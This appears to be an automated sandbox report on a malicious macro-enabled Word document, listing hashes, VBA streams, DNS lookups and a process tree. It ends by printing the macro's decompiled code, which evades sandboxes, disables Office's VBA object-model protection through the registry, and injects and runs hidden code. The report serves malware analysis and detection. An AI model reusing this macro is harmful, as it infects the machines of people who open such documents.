SHA-512: | 4427B5BA02CE68CD534F2F1F90BCB0E041EB55C2F8B0B7A0B53F20E6616B118A156B2537383CA94FE36DBE5A27B323F9BE2D723501097B504FC8EAC5E25C33AB |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22275 |
Entropy (8bit): | 7.594783952663905 |
Encrypted: | false |
SSDEEP: | 384:/i+n6XtwyM/zeqzzzNxt/ZtNNjx3KmEOTRwwLb5MB7ha/9Q4kvaQvGwKij:/B6d7Aze8lxllNjom5wwLtys92Hr |
MD5: | 214513CA29E10F2AFF14A45A5C72DCDF |
SHA1: | 72DDD82FD8F845FC3BB0EA27AD081C77EB4F0013 |
SHA-256: | BE17BE2BB898626B1F3DC3AE8BA4A038C98952FA81F9F6F936AB634CB9440F0D |
SHA-512: | 1D709638D689CF5FEA6BAEA831826A9B697BA0C27D8C18D852D0EB7DFC10FC6F2F125A4B2C7CE2B9012761F3CEF68BA5E8EB65260719AB4A668EDB76E765031B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67724 |
Entropy (8bit): | 7.825060500060554 |
Encrypted: | false |
SSDEEP: | 1536:qj/JOzG9/Us8bYCj7uPo6R464EDtV26zaVzuoZ:UEzG6s80nb46ttV26+VVZ |
MD5: | 5B91BC0F80C14E93496993B938AB7E75 |
SHA1: | 173DA3BBEE274D56028AC9AACCD2CBA88D7BBE60 |
SHA-256: | 78E94E326D636CEEE2608C075D349D2DF7AC3F5152D813A2B013FCCF8C5B56F3 |
SHA-512: | 2A97D6066A7A186DA996E0F031B7196379DFB93BF3CD2356AC16800E8B186DE33FF6CFB83EED3D3ABB879372D19E321A06172FBD46A6C2DC7A29BDB89EDA04BB |
Malicious: | true |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.9201639858336472 |
Encrypted: | false |
SSDEEP: | 3:ZaKlXCRl/YRlG1lllnlWllll3ZXkBIA/lDxcn:Za+XCDGGv/Q//J0Qn |
MD5: | 740162EC6B8A04D011DB1606BEE0CF6C |
SHA1: | 74463B89709B35E1C2B2FF3A19A7E865FD956CA5 |
SHA-256: | E26375DFE7F756DCE532D7194B91C23628AE466100891B812863AFBB21C7B054 |
SHA-512: | 5728D94C267E9829B610DD9ECBBCAE435300ADB0AFC7E7733377027FB1EB64E4987B056427588F4F6D2297F28477809883FBE88FC7C00438D32C2626E0FDB7A1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67724 |
Entropy (8bit): | 7.825060500060554 |
Encrypted: | false |
SSDEEP: | 1536:qj/JOzG9/Us8bYCj7uPo6R464EDtV26zaVzuoZ:UEzG6s80nb46ttV26+VVZ |
MD5: | 5B91BC0F80C14E93496993B938AB7E75 |
SHA1: | 173DA3BBEE274D56028AC9AACCD2CBA88D7BBE60 |
SHA-256: | 78E94E326D636CEEE2608C075D349D2DF7AC3F5152D813A2B013FCCF8C5B56F3 |
SHA-512: | 2A97D6066A7A186DA996E0F031B7196379DFB93BF3CD2356AC16800E8B186DE33FF6CFB83EED3D3ABB879372D19E321A06172FBD46A6C2DC7A29BDB89EDA04BB |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 69930 |
Entropy (8bit): | 7.8335863678621145 |
Encrypted: | false |
SSDEEP: | 1536:qZiOWSIVzyO/Xu+JRw2Q1J6R464EDtopRVaVzuomu:d3JyMXuswG46ttovgVVmu |
MD5: | 26DAC68F24F22D8CC2D5054DFC9FD899 |
SHA1: | B03178F255B23C45C74EC73B43B6ABD2B16A383A |
SHA-256: | DB36D979D08B262B79C1FA0F02A2DDA67B4C16DC5A8C98FA611A6578BE337E46 |
SHA-512: | 8430517511D9163DFDFE67FDE2F19B703F97344EAF3DA8788C1B0D7183A2C9E2E82A55D4E3A8EFB3DCA484750013F7D55479FC6DFF5DF6D334760DB9A419D227 |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67724 |
Entropy (8bit): | 7.825060500060554 |
Encrypted: | false |
SSDEEP: | 1536:qj/JOzG9/Us8bYCj7uPo6R464EDtV26zaVzuoZ:UEzG6s80nb46ttV26+VVZ |
MD5: | 5B91BC0F80C14E93496993B938AB7E75 |
SHA1: | 173DA3BBEE274D56028AC9AACCD2CBA88D7BBE60 |
SHA-256: | 78E94E326D636CEEE2608C075D349D2DF7AC3F5152D813A2B013FCCF8C5B56F3 |
SHA-512: | 2A97D6066A7A186DA996E0F031B7196379DFB93BF3CD2356AC16800E8B186DE33FF6CFB83EED3D3ABB879372D19E321A06172FBD46A6C2DC7A29BDB89EDA04BB |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.983048315287433 |
TrID: |
|
File name: | 40#U0433.doc |
File size: | 63'332 bytes |
MD5: | afe03893b7a5c589fc31f9ce9ed28a9f |
SHA1: | 8af5ac1b7432290e6070cf6d27a3a808db4a45b3 |
SHA256: | e440bad60823642e8976528bd450364ce2542d15a69778ff20996eb107158b8d |
SHA512: | 86f09cf8c95cc7311140130c4bb8e14249c85f6cd1837b629c3352debc2139a911833988bb6ea5c341236da0e77668af0ed77dfe87d8dede11a5ffdc63047aad |
SSDEEP: | 1536:qivW5gG87MhA3SzQMK7V7jJoZn4L4YoPQOfbrVhF:BvW5g13AQM8VVo44rVX |
TLSH: | 85530138F679A5A1C636B6B879E03A09C71CD147A71AA8742D1A73FC8007DE56F338D4 |
File Content Preview: | PK........,z0Y...;............[Content_Types].xml..Mn.0....z...@..EQ...h.e....F..f*...;..;.....3m...k.}........+v.......B......k.....".D.4t.a-.........>`*X.R-6D...Im.B.|@...G..?.Z.P.`...b.Y*.....3.jy.-l;*......1N........Bg...........QX........y.v.p..fl..P |
Icon Hash: | 35e1cc889a8a8599 |
Document Type: | OpenXML |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Title: | |
Author: | |
Template: | |
Last Saved By: | |
Revion Number: | 4 |
Total Edit Time: | 0 |
Create Time: | 2024-09-16T07:57:00Z |
Last Saved Time: | 2024-09-16T09:22:00Z |
Number of Pages: | 3 |
Number of Words: | 910 |
Number of Characters: | 5187 |
Creating Application: | |
Security: | 12 |
Number of Lines: | 43 |
Number of Paragraphs: | 12 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0000 |
General | |
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 5829 |
Data ASCII: | . . . . . . . . . l . . . . . . b . . . . . . . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . U e M y } u . * J . L _ \\ a . i . . . . . . . . . . . . . . . . . . . . N : W . : D D . : y W 4 . . . . . . . . . . . . . . . . . . . . . . x . . . . N : W . : D D . : y W 4 a . U e M y . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . |
Data Raw: | 01 16 03 00 06 00 01 00 00 6c 0a 00 00 e4 00 00 00 62 02 00 00 84 0b 00 00 92 0b 00 00 56 12 00 00 03 00 00 00 01 00 00 00 f9 85 91 97 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff a0 00 ff ff 00 00 ad eb 61 83 09 55 65 4d be ac 99 79 f7 b7 e7 de 7d 75 99 07 2a 4a 15 4c 90 5f 5c 61 be 1a b0 69 00 00 00 00 00 00 00 00 00 00 00 00 00 |
|
General | |
Stream Path: | PROJECT |
CLSID: | |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 438 |
Entropy: | 5.156275738049758 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 5 8 7 2 9 B 6 2 B 3 F 2 F 3 F 2 F 3 A 3 4 3 A 3 4 " . . D P B = " 0 A 0 8 A 6 3 1 3 6 4 E 3 6 4 E C 9 B 2 3 7 4 E E 8 8 C 4 B 4 6 8 E A 9 4 7 D B E 7 C 5 D C 7 E 2 F 1 A 9 5 6 5 D |
Data Raw: | 49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 |
General | |
Stream Path: | PROJECTwm |
CLSID: | |
File Type: | data |
Stream Size: | 41 |
Entropy: | 3.0773844850752607 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00 |
General | |
Stream Path: | VBA/_VBA_PROJECT |
CLSID: | |
File Type: | data |
Stream Size: | 3247 |
Entropy: | 4.532403418826159 |
Base64 Encoded: | False |
Data ASCII: | a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
General | |
Stream Path: | VBA/__SRP_0 |
CLSID: | |
File Type: | data |
Stream Size: | 3529 |
Entropy: | 3.4180952316532593 |
Base64 Encoded: | False |
Data ASCII: | K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ 6 . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 |
General | |
Stream Path: | VBA/__SRP_1 |
CLSID: | |
File Type: | data |
Stream Size: | 238 |
Entropy: | 2.11560831315699 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o b j A p p . . . . . . . . . . . . . . . . w s l . . . . . . . . . . . . . . . . n a m e d o c V . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00 |
General | |
Stream Path: | VBA/__SRP_2 |
CLSID: | |
File Type: | data |
Stream Size: | 3577 |
Entropy: | 3.725282825620112 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . / . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 2f 00 00 00 61 0a 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 81 0d 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | VBA/__SRP_3 |
CLSID: | |
File Type: | data |
Stream Size: | 420 |
Entropy: | 2.3674153773884705 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . 1 . . . . . . . . . . . O . P . 1 . . . . . . . . . . . . . . ` . . 9 . . . . . 1 . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . A . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . I . 8 . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . @ . . . . . . ` . . . * . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 a8 00 00 00 08 00 40 00 21 03 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 31 0e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
General | |
Stream Path: | VBA/dir |
CLSID: | |
File Type: | VAX-order 68k Blit mpx/mux executable |
Stream Size: | 522 |
Entropy: | 6.206794728607764 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . ! 8 h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . ) . . . * . \\ C . . . . . . . \\ K . . . . . r . . . & O . f f i c |
Data Raw: | 01 06 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 21 38 f2 68 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 84.201.210.39 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 217.20.57.19 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 217.20.57.36 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 217.20.57.18 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 217.20.57.35 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 217.20.57.20 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 217.20.57.34 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:37:46.314085960 CET | 1.1.1.1 | 192.168.2.27 | 0x7f97 | No error (0) | 84.201.210.23 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 15:37:50 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\appidpolicyconverter.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d8370000 |
File size: | 155'648 bytes |
MD5 hash: | 6567D9CF2545FAAC60974D9D682700D4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 1 |
Start time: | 15:37:50 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6adf60000 |
File size: | 1'040'384 bytes |
MD5 hash: | 9698384842DA735D80D278A427A229AB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:37:50 |
Start date: | 13/01/2025 |
Path: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e8c00000 |
File size: | 1'637'952 bytes |
MD5 hash: | A9F0EC89897AC6C878D217DFB64CA752 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 10 |
Start time: | 15:38:14 |
Start date: | 13/01/2025 |
Path: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e8c00000 |
File size: | 1'637'952 bytes |
MD5 hash: | A9F0EC89897AC6C878D217DFB64CA752 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 12 |
Start time: | 15:38:17 |
Start date: | 13/01/2025 |
Path: | C:\Windows\System32\mshta.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff721570000 |
File size: | 32'768 bytes |
MD5 hash: | 36D15DDE6D71802D9588CC0D48EDF8EA |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Has exited: | false |
Call Graph
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument
Declaration
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | Public objApp, wsl |
APIs | Meta Information |
---|---|
Unprotect | |
Shapes | |
ActiveDocument | |
Panes | |
Delete | |
Save | |
Now | |
Now | |
TimeValue | |
DoEvents | |
Now | |
TimeValue | |
Part of subcall function verydanger@ThisDocument: CreateObject | |
Part of subcall function verydanger@ThisDocument: RegWrite | |
Part of subcall function verydanger@ThisDocument: Version | |
Part of subcall function verydanger@ThisDocument: Application | |
CreateObject | CreateObject( |
Visible | |
Documents | |
Variables | |
ActiveDocument | |
Add | |
Name | |
AddFromString | |
vbCrLf | |
Part of subcall function danger@ThisDocument: Item | |
ExpandEnvironmentStrings | IWshShell3.ExpandEnvironmentStrings( |
SaveAs2 | |
Name | |
ActiveDocument | |
Close | |
Part of subcall function rundoc@ThisDocument: Open | |
Part of subcall function rundoc@ThisDocument: Save | |
Part of subcall function rundoc@ThisDocument: Close | |
Name | |
ActiveDocument | |
Quit |
Strings | Decrypted Strings |
---|---|
"oikmseM#*inmowefj8349an3" | |
"00:00:15" | |
"Word.Application" | |
"Sub goods() : : End Sub" | |
"ThisDocument" | |
"%localapp""data%\T""emp" |
Line | Instruction | Meta Information |
---|---|---|
24 | Sub documeNt_opEn() | |
25 | On Error Resume Next | executed |
26 | ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3") | Unprotect |
27 | For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step - 1 | Shapes ActiveDocument Panes |
28 | ActiveDocument.Shapes(i).Delete | Delete |
29 | Next i | Shapes ActiveDocument Panes |
30 | ActiveDocument.Save | Save |
31 | sss = Now() | Now |
32 | While Now < sss + TimeValue("00:00:20") | Now TimeValue |
33 | DoEvents | DoEvents |
34 | Wend | Now TimeValue |
35 | If Now() - sss < TimeValue("00:00:15") Then | Now TimeValue |
35 | Exit Sub | |
35 | Endif | |
36 | verydanger | |
37 | Set objApp = CreateObject("Word.Application") | CreateObject( |
38 | objApp.Visible = False | Visible |
39 | Set doc = objApp.Documents.Add | Documents |
40 | For Each vars in ActiveDocument.Variables | Variables ActiveDocument |
41 | doc.Variables.Add vars.Name & "ergegdr", vars | Add Name |
42 | i = i + 1 | |
43 | Next | Variables ActiveDocument |
44 | doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger() | AddFromString vbCrLf |
45 | tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") | IWshShell3.ExpandEnvironmentStrings( |
46 | doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13 | SaveAs2 Name ActiveDocument |
47 | doc.Close | Close |
48 | rundoc (tmp & "\" & ActiveDocument.Name & ".doc") | Name ActiveDocument |
49 | objApp.Quit False | Quit |
50 | End Sub |
APIs | Meta Information |
---|---|
Open | Documents.Open( |
Save | |
Close |
Line | Instruction | Meta Information |
---|---|---|
13 | Function rundoc(namedoc) | |
14 | Set doc2 = objApp.Documents.Open(namedoc) | Documents.Open( |
15 | doc2.Save | Save |
16 | doc2.Close | Close |
17 | End Function |
APIs | Meta Information |
---|---|
CreateObject | CreateObject( |
RegWrite | |
Version | |
Application |
Strings | Decrypted Strings |
---|---|
"WSc""ript.She" | |
"HK""CU\Softw""are\Micr""osoft\Of""fice\" | |
"REG_D""WORD" |
Line | Instruction | Meta Information |
---|---|---|
18 | Sub verydanger() | |
19 | strng = "WSc" & "ript.She" | executed |
20 | strng = strng & "ll" | |
21 | Set wsl = CreateObject(strng) | CreateObject( |
22 | wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD" | RegWrite Version Application |
23 | End Sub |
APIs | Meta Information |
---|---|
Item |
Strings | Decrypted Strings |
---|---|
"s2" |
Line | Instruction | Meta Information |
---|---|---|
10 | Function danger() | |
11 | danger = ActiveDocument.Variables.Item("s2") | Item executed |
12 | End Function |